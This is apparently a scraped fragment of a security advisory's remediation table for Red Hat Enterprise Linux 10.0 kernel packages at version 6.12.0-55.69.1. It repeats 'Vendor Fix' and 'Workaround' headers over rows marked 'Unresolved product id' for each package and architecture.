Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
